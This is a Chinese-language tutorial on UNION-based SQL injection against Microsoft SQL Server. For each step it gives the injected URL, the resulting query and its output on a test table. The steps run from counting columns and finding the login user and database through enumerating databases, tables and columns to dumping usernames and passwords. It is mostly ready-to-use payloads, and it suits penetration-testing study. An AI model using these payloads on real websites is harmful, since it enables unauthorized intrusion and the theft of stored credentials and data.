0x00 概要
在页面有显示位的情况下使用
0x01 测试数据
1> select * from article;
2> go
+----+-----------+-----------+
| id | title | content |
+----+-----------+-----------+
| 1 | 测试标题 | 测试内容 |
| 2 | 测试标题2 | 测试内容2 |
+----+-----------+-----------+
(2 rows affected)
# 测试表数据: users;
sql server> select * from users;
+----+--------------+----------+
| id | username | password |
+----+--------------+----------+
| 1 | test-user-01 | 123456 |
| 2 | test-user-02 | 234567 |
+----+--------------+----------+
2 rows in set (0.00 sec)
sql server> SELECT system_user;
+-----------------------+
| field1 |
+-----------------------+
| sa |
+-----------------------+
1 row in set (0.00 sec)
sql server> select db_name();
+-----------------------+
| field1 |
+-----------------------+
| test |
+-----------------------+
1 row in set (0.00 sec)
0x02 查看列数
web语句: http://www.test.com/sql.php?id=1 order by 3
数据库语句: select * from users where id=1 order by 3
# 正确的时候会返回原来的数据
+-----+--------------+------------+
| id | username | password |
+--------+------------+-----------+
| 1 | test-user-01 | 123456 |
+-----+--------------+------------+
(1 rows affected)
# 错误的时候
sql server> select * from users where id=1 order by 4;
42000 - [SQL Server]ORDER BY 位置号 4 超出了选择列表中项数的范围。
0x03 爆当前连接用户
web语句: http://www.test.com/sql.php?id=-1 union select system_user,null,null
数据库语句: select * from users where id=-1 union select system_user,null,null
1> select * from users where id=-1 union select system_user,null,null;
+----+----------+-----------+
| id | username | password |
+----+----------+-----------+
| sa | null | null |
+----+----------+-----------+
(1 rows affected)
0x04 爆当前连接的数据库
web语句: http://www.test.com/sql.php?id=-1 union select null,db_name(),null
数据库语句: select * from users where id=-1 union select null,db_name(),null
1> select * from users where id=-1 union select null,db_name(),null;
+----+----------+-----------+
| id | username | password |
+----+----------+-----------+
|null| test | null |
+----+----------+-----------+
(1 rows affected)
0x05 爆库名方法一
注意: 修改 db_name(1) 中的数字参数会显示其他库名
例如:
修改为db_name(1) 就是出1库
修改为db_name(2) 就是出2库
web语句: http://www.test.com/sql.php?id=-1 union select null,db_name(1),null
数据库语句: select * from users where id=-1 union select null,db_name(1),null
# 获取 1库
1> select * from users where id=-1 union select null,db_name(1),null;
+------+----------+-----------+
| id | username | password |
+------+----------+-----------+
| NULL | master | NULL |
+------+----------+-----------+
(1 rows affected)
# 获取 2库
1> select * from users where id=-1 union select null,db_name(2),null;
+------+----------+-----------+
| id | username | password |
+------+----------+-----------+
| NULL | tempdb | NULL |
+------+----------+-----------+
(1 rows affected)
0x06 爆库名方法二
优点:简单
缺点:要是查询的 dbid 刚好不存在,那么就会查询不出数据
查询不同的库可以这样
例如:
修改 dbid>=1
修改 dbid>=2
web语句: http://www.test.com/sql.php?id=-1 union select top 1 null,name,null from master.dbo.sysdatabases where dbid>=1
数据库语句: select * from users where id=-1 union select top 1 null,name,null from master.dbo.sysdatabases where dbid>=1
# 获取 1库
1> SELECT
*
FROM
users
WHERE
id =- 1
UNION
SELECT
TOP 1 NULL,
name,
NULL
FROM
master.dbo.sysdatabases
WHERE
dbid >= 1;
+------+----------+-----------+
| id | username | password |
+------+----------+-----------+
| NULL | master | NULL |
+------+----------+-----------+
(1 rows affected)
# 获取 2库
1> SELECT
*
FROM
users
WHERE
id =- 1
UNION
SELECT
TOP 1 NULL,
name,
NULL
FROM
master.dbo.sysdatabases
WHERE
dbid >= 2;
+------+----------+-----------+
| id | username | password |
+------+----------+-----------+
| NULL | tempdb | NULL |
+------+----------+-----------+
(1 rows affected)
0x06 爆库名方法三
优点:可以保证每个 row_number 都是查询得到的
注意:
OVER(Order by dbid) 里面的 dbid 要修改为 master.dbo.sysdatabases 表里面存在的一个字段
查询不同的库可以这样
例如:
修改 row_number=1
修改 row_number=2
web语句: http://www.test.com/sql.php?id=-1 union select top 1 null,a.name,null from (select ROW_NUMBER() OVER(Order by dbid) AS row_number,name from master.dbo.sysdatabases) as a where row_number=1
数据库语句: select * from users where id=-1 union select top 1 null,a.name,null from (select ROW_NUMBER() OVER(Order by dbid) AS row_number,name from master.dbo.sysdatabases) as a where row_number=1
# 获取 1库
1> SELECT
*
FROM
users
WHERE
id =- 1
UNION
SELECT
TOP 1 NULL,
a.name,
NULL
FROM
(
SELECT
ROW_NUMBER () OVER (ORDER BY dbid) AS row_number,
name
FROM
master.dbo.sysdatabases
) AS a
WHERE
row_number = 1;
+------+----------+-----------+
| id | username | password |
+------+----------+-----------+
| NULL | master | NULL |
+------+----------+-----------+
(1 rows affected)
1> SELECT
*
FROM
users
WHERE
id =- 1
UNION
SELECT
TOP 1 NULL,
a.name,
NULL
FROM
(
SELECT
ROW_NUMBER () OVER (ORDER BY dbid) AS row_number,
name
FROM
master.dbo.sysdatabases
) AS a
WHERE
row_number = 2;
+------+----------+-----------+
| id | username | password |
+------+----------+-----------+
| NULL | tempdb | NULL |
+------+----------+-----------+
(1 rows affected)
0x07 爆表名
注意:
OVER(Order by table_name) 里面的 table_name 要修改为 information_schema.tables 表里面存在的一个字段
查询不同的库可以这样
例如:
table_catalog=db_name() (查询当前库)
table_catalog='要查询的库名'
查询不同的表可以这样
例如:
修改 row_number=1
修改 row_number=2
web语句: http://www.test.com/sql.php?id=-1 union select top 1 null,a.table_name,null from (select ROW_NUMBER() OVER(Order by table_name) AS row_number,table_name FROM information_schema.tables where table_catalog=db_name()) as a where row_number=1
数据库语句: select * from users where id=-1 union select top 1 null,a.table_name,null from (select ROW_NUMBER() OVER(Order by table_name) AS row_number,table_name FROM information_schema.tables where table_catalog=db_name()) as a where row_number=1
# 爆 1表
1> SELECT
*
FROM
users
WHERE
id =- 1
UNION
SELECT
TOP 1 NULL,
a.table_name,
NULL
FROM
(
SELECT
ROW_NUMBER () OVER (ORDER BY table_name) AS row_number,
table_name
FROM
information_schema.tables
WHERE
table_catalog = db_name()
) AS a
WHERE
row_number = 1;
2> go
+------+----------+-----------+
| id | username | password |
+------+----------+-----------+
| NULL | article | NULL |
+------+----------+-----------+
(1 rows affected)
# 爆 2表
1> SELECT
*
FROM
users
WHERE
id =- 1
UNION
SELECT
TOP 1 NULL,
a.table_name,
NULL
FROM
(
SELECT
ROW_NUMBER () OVER (ORDER BY table_name) AS row_number,
table_name
FROM
information_schema.tables
WHERE
table_catalog = db_name()
) AS a
WHERE
row_number = 2;
2> go
+------+----------+-----------+
| id | username | password |
+------+----------+-----------+
| NULL | users | NULL |
+------+----------+-----------+
(1 rows affected)
0x08 爆字段
注意:
OVER(Order by column_name) 里面的 column_name 要修改为 information_schema.columns 表里面存在的一个字段
查询不同的表可以这样
例如:
table_name='要查询的表名'
查询不同的字段可以这样
例如:
修改 row_number=1
修改 row_number=2
web语句: http://www.test.com/sql.php?id=-1 union select top 1 null,a.column_name,null from (select ROW_NUMBER() OVER(Order by column_name) AS row_number,column_name from information_schema.columns where table_catalog=db_name() and table_name='users') as a where row_number=1
数据库语句: select top 1 null,a.column_name,null from (select ROW_NUMBER() OVER(Order by column_name) AS row_number,column_name from information_schema.columns where table_catalog=db_name() and table_name='users') as a where row_number=1
# 获取当前库 users表 第一个字段名称
1>
SELECT
TOP 1 NULL,
a.column_name,
NULL
FROM
(
SELECT
ROW_NUMBER () OVER (ORDER BY column_name) AS row_number,
column_name
FROM
information_schema.columns
WHERE
table_catalog = db_name()
AND table_name = 'users'
) AS a
WHERE
row_number = 1;
2> go
+------+-------------+------+
| | column_name | |
+------+-------------+------+
| NULL | id | NULL |
+------+-------------+------+
(1 rows affected)
# 获取当前库 users表 第二个字段名称
1>
SELECT
TOP 1 NULL,
a.column_name,
NULL
FROM
(
SELECT
ROW_NUMBER () OVER (ORDER BY column_name) AS row_number,
column_name
FROM
information_schema.columns
WHERE
table_catalog = db_name()
AND table_name = 'users'
) AS a
WHERE
row_number = 2;
2> go
+------+-------------+------+
| | column_name | |
+------+-------------+------+
| NULL | password | NULL |
+------+-------------+------+
(1 rows affected)
0x09 爆内容
注意:
OVER(Order by username) 里面的 username 要修改为 users 表里面存在的一个字段
查询不同的数据可以这样
例如:
修改 row_number=1
修改 row_number=2
web语句: http://www.test.com/sql.php?id=-1 union select a.id,a.username,a.password from (SELECT ROW_NUMBER () OVER (ORDER BY username) AS row_number,* from users) as a where row_number=1
数据库语句: select * from users where id=-1 union select a.id,a.username,a.password from (SELECT ROW_NUMBER () OVER (ORDER BY username) AS row_number,* from users) as a where row_number=1
# 查询users表 第一条数据
1> SELECT
*
FROM
users
WHERE
id =- 1
UNION
SELECT
a.id,
a.username,
a.password
FROM
(
SELECT
ROW_NUMBER () OVER (ORDER BY username) AS row_number ,*
FROM
users
) AS a
WHERE
row_number = 1;
2> go
+--------+------------+-----------+
| id | username | password |
+--------+------------+-----------+
| 1 | test-user-01 | 123456 |
+--------+------------+-----------+
(1 rows affected)
# 查询users表 第二条数据
1> SELECT
*
FROM
users
WHERE
id =- 1
UNION
SELECT
a.id,
a.username,
a.password
FROM
(
SELECT
ROW_NUMBER () OVER (ORDER BY username) AS row_number ,*
FROM
users
) AS a
WHERE
row_number = 2;
2> go
+--------+------------+-----------+
| id | username | password |
+--------+------------+-----------+
| 2 | test-user-02 | 234567 |
+--------+------------+-----------+
(1 rows affected)